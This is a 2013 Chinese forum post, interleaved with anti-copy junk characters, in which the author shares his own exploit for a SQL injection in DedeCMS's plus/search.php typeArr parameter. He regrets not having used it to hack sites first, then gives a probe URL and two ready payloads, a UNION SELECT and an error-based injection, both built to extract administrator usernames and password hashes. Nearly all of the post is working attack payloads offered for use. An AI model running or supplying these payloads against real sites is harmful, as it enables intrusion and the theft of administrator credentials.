转载不加作者名的没JJ( g9 @0 B/ t2 W$ a- v3 O: ~
" _1 X T. F. U* a% ?
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
+ I+ t! `, v3 A K, R
0 t. j, X0 {* ]3 a1 u S ^7 @% X. }既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
% ]+ j" J7 |" l' Z7 L7 u+ o+ H( A; W# Y# ^3 w2 u4 Q, g" ]
我一般是这样测试的:: t1 M5 a7 l4 B) B. s8 @0 l
6 ?1 e: J: k3 k2 M( n提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
1 p/ t! O+ [) p1 h3 K6 j, g3 |: R
' Z2 b* o+ w7 {/ e转载不加作者名的没JJ
( [! u' b1 u( W1 e
) R# ]. g+ Q" `, P+ l$ [作者:鬼哥
! d% E" a# e1 G1 R8 D+ D
* J: {2 C7 U/ `. m8 ]6 n : N* m% ^- G+ \) S( W) u
. V' [. ]- ]- w0 Q; o: `看结果如果提示# L/ S4 l6 b* k# Y4 p
$ @0 M7 J8 y% w( ^' u* H, K% LSafe Alert: Request Error step 2 !
- c$ ?9 R8 R$ P, h! i. J- B2 H1 @4 _
那么直接用下面的exp
! S, c, X0 `. t/ Q5 m* C [
* u y! P; g! ^' S! J. O. L' hxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a! N' I* i n# Q( G: z
9 \+ o. l* a. \' Y
1 v2 A( j) X, L1 b看结果如果提示6 g1 K2 S% t3 i a" D
0 n, M, i: y! v. M, ?/ l" \
Safe Alert: Request Error step 1 !
, b0 R0 [) r6 }$ d) m! J0 m$ P
5 g" p; T8 Z; A+ @$ m$ ^( N: E那么直接用下面的exp
( g9 |# H: o& u+ W, O/ J, ?; G* c- x& g1 N0 J5 i
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a2 k+ ^2 z6 y3 {7 \
$ y' U3 L/ V1 D8 A- z0 C6 h' L: T
; S) ^" t ?5 Q: l/ h# H- f如果正常显示证明漏洞不存在了。
" c3 l' x/ k3 J$ e5 @" d2 R- D2 I1 h! W" P
转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对